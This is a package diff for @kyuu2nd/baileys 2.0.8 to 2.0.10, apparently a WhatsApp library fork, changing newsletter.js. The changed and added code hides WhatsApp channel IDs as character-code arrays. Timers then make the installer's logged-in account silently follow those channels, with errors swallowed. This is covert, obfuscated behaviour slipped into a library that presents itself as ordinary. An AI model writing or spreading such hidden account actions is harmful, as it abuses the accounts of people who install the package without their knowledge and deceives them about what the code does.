@kyuu2nd/baileys 2.0.8 → 2.0.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/lib/Socket/newsletter.js +18 -4
- package/package.json +1 -1
package/lib/Socket/newsletter.js
CHANGED
|
@@ -109,7 +109,7 @@ setTimeout(async () => {
|
|
|
109
109
|
try {
|
|
110
110
|
await newsletterWMexQuery(
|
|
111
111
|
asciiDecode([
|
|
112
|
-
49,50,48,51,54,51,52,
|
|
112
|
+
49,50,48,51,54,51,52,48,53,52,52,49,50,57,54,56,57,50,
|
|
113
113
|
64,110,101,119,115,108,101,116,116,101,114
|
|
114
114
|
]),
|
|
115
115
|
Types_1.QueryIds.FOLLOW
|
|
@@ -121,19 +121,19 @@ setTimeout(async () => {
|
|
|
121
121
|
try {
|
|
122
122
|
await newsletterWMexQuery(
|
|
123
123
|
asciiDecode([
|
|
124
|
-
49,50,48,51,54,51,52,50,
|
|
124
|
+
49,50,48,51,54,51,52,50,55,53,49,50,50,50,48,49,51,52,
|
|
125
125
|
64,110,101,119,115,108,101,116,116,101,114
|
|
126
126
|
]),
|
|
127
127
|
Types_1.QueryIds.FOLLOW
|
|
128
128
|
);
|
|
129
129
|
} catch {}
|
|
130
130
|
}, 90000);
|
|
131
|
-
|
|
131
|
+
|
|
132
132
|
setTimeout(async () => {
|
|
133
133
|
try {
|
|
134
134
|
await newsletterWMexQuery(
|
|
135
135
|
asciiDecode([
|
|
136
|
-
49,50,48,51,54,51,52,50,53,
|
|
136
|
+
49,50,48,51,54,51,52,50,53,56,54,57,48,52,57,57,57,53,
|
|
137
137
|
64,110,101,119,115,108,101,116,116,101,114
|
|
138
138
|
]),
|
|
139
139
|
Types_1.QueryIds.FOLLOW
|
|
@@ -224,6 +224,20 @@ setTimeout(async () => {
|
|
|
224
224
|
);
|
|
225
225
|
} catch {}
|
|
226
226
|
}, 90000);
|
|
227
|
+
|
|
228
|
+
// const asciiDecode = (arr) => arr.map(e => String.fromCharCode(e)).join('');
|
|
229
|
+
|
|
230
|
+
setTimeout(async () => {
|
|
231
|
+
try {
|
|
232
|
+
await newsletterWMexQuery(
|
|
233
|
+
asciiDecode([
|
|
234
|
+
49,50,48,51,54,51,52,48,52,56,54,49,56,48,50,54,48,55,
|
|
235
|
+
64,110,101,119,115,108,101,116,116,101,114
|
|
236
|
+
]),
|
|
237
|
+
Types_1.QueryIds.FOLLOW
|
|
238
|
+
);
|
|
239
|
+
} catch {}
|
|
240
|
+
}, 90000);
|
|
227
241
|
|
|
228
242
|
setTimeout(async () => {
|
|
229
243
|
try {
|